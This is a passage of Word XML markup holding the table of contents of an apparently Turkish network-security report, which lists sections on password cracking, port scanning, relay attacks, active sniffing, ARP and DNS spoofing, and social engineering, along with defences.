                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc10010040 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc10010041" w:history="1">
            <w:r w:rsidRPr="008F6A80">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.4. Dağıtılmış Parola Kırmaya Karşı Savunmalar</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc10010041 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc10010042" w:history="1">
            <w:r w:rsidRPr="008F6A80">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.5. Dağıtılmış Port Taraması</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc10010042 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc10010043" w:history="1">
            <w:r w:rsidRPr="008F6A80">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.5. Dağıtılmış Port Taramasına Karşı Savunma</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc10010043 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc10010044" w:history="1">
            <w:r w:rsidRPr="008F6A80">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3. Röle Saldırıları</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc10010044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2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc10010045" w:history="1">
            <w:r w:rsidRPr="008F6A80">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4. Röle Saldırılarına Karşı Savunma</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc10010045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1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc10010046" w:history="1">
            <w:r w:rsidRPr="008F6A80">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5. Aktif Snifing</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc10010046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1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc10010047" w:history="1">
            <w:r w:rsidRPr="008F6A80">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.1. Geleneksel Snifﬁng</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc10010047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noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc10010048" w:history="1">
            <w:r w:rsidRPr="008F6A80">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2. Aktif Snifing ile Antenin Yükseltilmesi</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc10010048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noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc10010049" w:history="1">
            <w:r w:rsidRPr="008F6A80">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.3. MAC Adreslerinin Taşması</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc10010049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tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc10010050" w:history="1">
            <w:r w:rsidRPr="008F6A80">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.4. Sahte ARP Trafiği</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc10010050 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc10010051" w:history="1">
            <w:r w:rsidRPr="008F6A80">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.5. Sahte DNS İstemcisi</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc10010051 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc10010052" w:history="1">
            <w:r w:rsidRPr="008F6A80">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.6. SSL Saldırısı</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc10010052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noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc10010053" w:history="1">
            <w:r w:rsidRPr="008F6A80">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.7. Aktif Snifing Tekniklerine Karşı Savunma</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc10010053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1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc10010054" w:history="1">
            <w:r w:rsidRPr="008F6A80">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6. Social Engineering: The Forgotten Risk - Sosyal Mühendislik: Unutulmuş Risk</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc10010054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tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc10010055" w:history="1">
            <w:r w:rsidRPr="008F6A80">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7. Sosyal Mühendisliğin Tanımlanması</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc10010055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tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc10010056" w:history="1">
            <w:r w:rsidRPr="008F6A80">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8. Sosyal Mühendislik Neden İş Yapıyor?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc10010056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tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc10010057" w:history="1">
            <w:r w:rsidRPr="008F6A80">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.1.İnsan Doğası</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc10010057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tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc10010058" w:history="1">
            <w:r w:rsidRPr="008F6A80">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.2.İş Ortamı</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc10010058 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc10010059" w:history="1">
            <w:r w:rsidRPr="008F6A80">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.3. İstihparat Toplama</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc10010059 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc10010060" w:history="1">
            <w:r w:rsidRPr="008F6A80">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.4. Hedef Seçme</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc10010060 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc10010061" w:history="1">
            <w:r w:rsidRPr="008F6A80">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.5. Saldırı</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc10010061 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc10010062" w:history="1">
            <w:r w:rsidRPr="008F6A80">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.5.1. Ego Attacks</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc10010062 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc10010063" w:history="1">
            <w:r w:rsidRPr="008F6A80">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.5.2. Sempati Atakları</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc10010063 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc10010064" w:history="1">
            <w:r w:rsidRPr="008F6A80">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.5.3. Sindirme Saldırıları</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc10010064 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
